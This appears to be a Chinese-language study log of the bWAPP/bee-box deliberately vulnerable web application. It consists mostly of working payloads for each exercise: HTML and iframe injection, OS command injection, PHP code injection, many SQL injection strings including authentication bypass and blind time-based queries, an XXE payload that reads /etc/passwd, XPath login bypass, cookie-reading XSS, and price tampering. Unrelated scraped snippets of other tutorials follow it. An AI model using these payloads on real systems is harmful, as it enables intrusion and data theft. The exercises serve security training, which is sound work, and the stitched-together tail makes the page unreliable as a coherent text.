BwApp学习记录

下载&安装

bwapp可以单独下载,然后部署到apache+php+mysql的环境,也可以下载他的虚拟机版本bee-box,但是有好多漏洞是bee-box里边有,但单独安装bwapp没有的,比如破壳漏洞,心脏滴血漏洞等。我这里主要用bee-box进行介绍。

下载地址

     【传送门

开始搞事情

0x00 HTML Injection - Reflected (GET)

【Low】

<a href="http://www.baidu.com">OnClick</a>

【medium】

%3ca href=http://www.baidu.com%3eClick%3c/a%3e

0x01 HTML Injection - Reflected (POST)

【Low】

<a href="http://www.baidu.com">OnClick</a>

【medium】

%3ca href=http://www.baidu.com%3eClick%3c/a%3e

0x02 iFrame Injection

?ParamUrl=http://www.baidu.com

0x03 OS Command Injection

Exploit(Low)

www.nsa.gov;id

Exploit(medium)

www.nsa.gov|id

0x04 PHP Code Injection

?message=phpinfo()

0x05 SQL Injection (GET/Search)

Exploit(Low)

-1 %‘+union+select+1,2,3,4,version(),6,7 --+

0x06 SQL Injection (GET/Select)

Exploit(Low)

?movie=-1 union select 1,2,3,4,version(),6,7

0x07 SQL Injection (POST/Search)

title=Iron+Man%‘UNION SELECT 1,2,3,4,version(),6,7  #

0x08 SQL Injection (POST/Select)

movie=-1 UNION SELECT 1,2,3,4,version(),6,7

0x09 SQL Injection (AJAX/JSON/jQuery)

http://192.168.0.32/bWAPP/sqli_10-2.php?title=I%%27+UNION+SELECT+1,2,3,4,version(),6,7+--+

0x10 SQL Injection (CAPTCHA)

?title=Iron+Man%‘ UNION SELECT 1,2,3,4,version(),6,7 --+

0x11 SQL Injection (Login Form/Hero)

superhero‘ or 1=1#

0x12 SQL Injection (Login Form/User)

login=‘ and 0 UNION SELECT 1,2,‘356a192b7913b04c54574d18c28d46e6395428ab‘,4,5,6,7,8,9#
&password=1
&form=submit

0x13 SQL Injection - Stored (Blog)

‘,(select version()))#

0x14 SQL Injection - Stored (User-Agent)

User-AgentL: 123‘,(select version()))#

0x15 SQL Injection - Stored (XML)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
  <login>&test;</login>
  <secret>login</secret>
</rest>

0x16 SQL Injection - Blind - Boolean-Based

?title=Iron Man ‘ and (substr((select version()),1,1)=5) --+

0x17 SQL Injection - Blind - Time-Based

?title=Iron Man‘ and (if((substr((select version()),1,1)=5),sleep(5),null)) --+

0x18 SQL Injection - Blind (WS/SOAP) 

?title=Iron Man ‘ and (substr((select version()),1,1)=5) --+

0x19 XML/XPath Injection (Login Form)

http://192.168.0.32/bWAPP/xmli_1.php
?login=‘ or ‘1‘=‘1
&password=‘ or ‘1‘=‘1
&form=submit

0x20 Broken Auth. - CAPTCHA Bypassing

0x21 Broken Auth. - Forgotten Function

0x22 Broken Auth. - Insecure Login Forms

0x23 Broken Auth. - Password Attacks

0x24 Broken Auth. - Weak Passwords

0x25 Session Mgmt. - Administrative Portals

0x26 XSS - Reflected (GET)

<script>alert(document.cookie)</script>

0x27 XSS - Reflected (POST)

<script>alert(document.cookie)</script>

0x28 XSS - Reflected (JSON)

<img src=1 onerror=alert(1) />

0x29 XSS - Reflected (AJAX/JSON)

<img src=1 onerror=alert(1) />

0x30 XSS - Reflected (Back Button)

Referer: ‘" onmousemove="alert(1)"
修改请求包referer字段

0x31 XSS - Reflected (Custom Header)

bWAPP: <script>alert(1)</script>
增加请求包字段

0x32 XSS - Reflected (Eval)

?date=alert(document.cookie)

0x33 XSS - Reflected (HREF)

><script>alert(1)</script>

0x34 XSS - Reflected (Login Form)

login=‘ or 1=1 
&password=<script>alert(1)</script>
&form=submit

0x35 XSS - Reflected (PHP_SELF)

<script>alert(document.cookie)</script>

0x36 XSS - Reflected (Referer)

<script>alert(document.cookie)</script>

0x37 XSS - Reflected (User-Agent)

<script>alert(document.cookie)</script>

0x38 XSS - Stored (Blog)

<script>alert(document.cookie)</script>

0x39 XSS - Stored (User-Agent)

User-Agent: <script>alert(document.cookie)</script>

0x40 Insecure DOR (Order Tickets)

(Low)
ticket_quantity=15&ticket_price=0&action=order
修改 数据包 ticket_price 的值

(medium)
ticket_quantity=15&ticket_price=0&action=order
在 请求包中增加ticket_price 参数 并赋值。

时间: 2024-11-29 09:35:46

BwApp学习记录的相关文章

Python学习记录-2016-12-17

今日学习记录 模块: import os#导入os模块 import sys#导入sys模块 os.system("df -h")#执行df -h命令 cmd_res = os.popen("df -h").read()#将命令的返回结果赋值给cmd_res,如果不加入.read()会显示命令的返回加过在内存的位置 print(sys.path)#显示系统变量路径,一般个人模块位于site-packages下,系统模块位于lib下 print(sys.argu[2]

Objc基础学习记录5

NSMutableString类继承的NSString类. NSMutableString是动态的字符串. 1.appendingString 方式: 向字符串尾部添加一个字符串. 2.appendingFormat:可以添加多个类型的字符串. int,chat float,double等 3.stringWithString 创建字符串, 4.rangeOfString 返回str1在另一个字符串中的位置. 5.NSMakeRange(0,3) 字符串0位到3位. 6.deleteCharac

Windows API 编程学习记录&lt;二&gt;

恩,开始写Windows API编程第二节吧. 上次介绍了几个关于Windows API编程最基本的概念,但是如果只是看这些概念,估计还是对Windows API不是很了解.这节我们就使用Windows API 让大家来了解下Windows API的用法. 第一个介绍的Windows API 当然是最经典的MessageBox,这个API 的作用就是在电脑上显示一个对话框,我们先来看看这个API的定义吧: int WINAPI MessageBox(HWND hWnd, LPCTSTR lpTe

Windows API 编程学习记录&lt;三&gt;

恩,开始写API编程的第三节,其实马上要考试了,但是不把这节写完,心里总感觉不舒服啊.写完赶紧去复习啊       在前两节中,我们介绍了Windows API 编程的一些基本概念和一个最基本API函数 MessageBox的使用,在这节中,我们就来正式编写一个Windows的窗口程序. 在具体编写代码之前,我们必须先要了解一下API 编写窗口程序具体的三个基本步骤:             1. 注册窗口类:             2.创建窗口:             3.显示窗口: 恩,

Python学习记录day6

Python学习记录day6 学习 python Python学习记录day6 1.反射 2.常用模块 2.1 sys 2.2 os 2.3 hashlib 2.3 re 1.反射 反射:利用字符串的形式去对象(默认)中操作(寻找)成员 cat commons.py #!/usr/bin/env python#_*_coding:utf-8_*_''' * Created on 2016/12/3 21:54. * @author: Chinge_Yang.''' def login(): pr

Python学习记录-2016-11-29

今日学习记录: 心灵鸡汤: 要有合适自己的目标,一个目标一个目标实现,切忌好高骛远: 最好的投资就是投资自己: 实现梦想 学习,学习,再学习: Talk is cheap. 从本身而言,余三十而立之年,从事测试行业7七年有余,一年半华为外包路由器,两年无线wifi测试,一年半网管软件测试,一年自动化测试经理,推行公司自动化测试进程,从开始的TCL,到现在的python,工欲善其事必先利其器,所以自己来学习,总体我认为我的目标是一直前进的,不断变化的,但是方向并没有大的错误,有些累,所以近期有些懈

程序的机械级表示学习记录

程序的机械级表示学习记录 X86的三代寻址方式 DOS时代的平坦模式,不区分用户空间和内核空间,很不安全. 8086的分段模式. IA32的带保护模式的平坦模式. 对于机械级编程的两种重要抽象 ISA:机械级程序的格式和行为,定义为指令集体系结构,它定义了处理器状态.指令的格式,以及每条指令对状态的影响. 虚拟地址:机器级程序使用的存储器地址,提供的存储器模型看上去是一个非常大的数组.存储器系统的实际实现是将多个硬件存储器和操作系统软件组合起来的. 在GCC中获得汇编代码与反汇编 获得汇编代码:

python 系统地学习记录

由头: python值得一学. 尝试一下写学习记录,看看效果. 1.记录一些不熟悉或者重要的知识点. 2.记录一些遇到的问题,标签 Question. 书:python基础教程(第2版) Chapter 1:基础知识 本章的内容熟悉即可. 比较重要的是字符串,单双引号转义,str,repr... Time 1.5 h  2015.8.31 23:09 版权声明:本文为博主原创文章,未经博主允许不得转载.

Java 静态内部类与非静态内部类 学习记录.

目的 为什么会有这篇文章呢,是因为我在学习各种框架的时候发现很多框架都用到了这些内部类的小技巧,虽然我平时写代码的时候基本不用,但是看别人代码的话至少要了解基本知识吧,另外到底内部类应该应用在哪些场合,我并不是很清楚,留下一些值得思考的问题作为记录,说不定以后能自己来填.于是就会有这篇文章啦. 常规使用方法我也不想介绍,网上一大把,我就说说比较容易错的,值得注意的地方. 注意 这篇文章只是分享一下我对内部类的一些研究与困惑吧,说不定对大家有帮助,说不定能引导大家一起思考学习.Java语法知识其实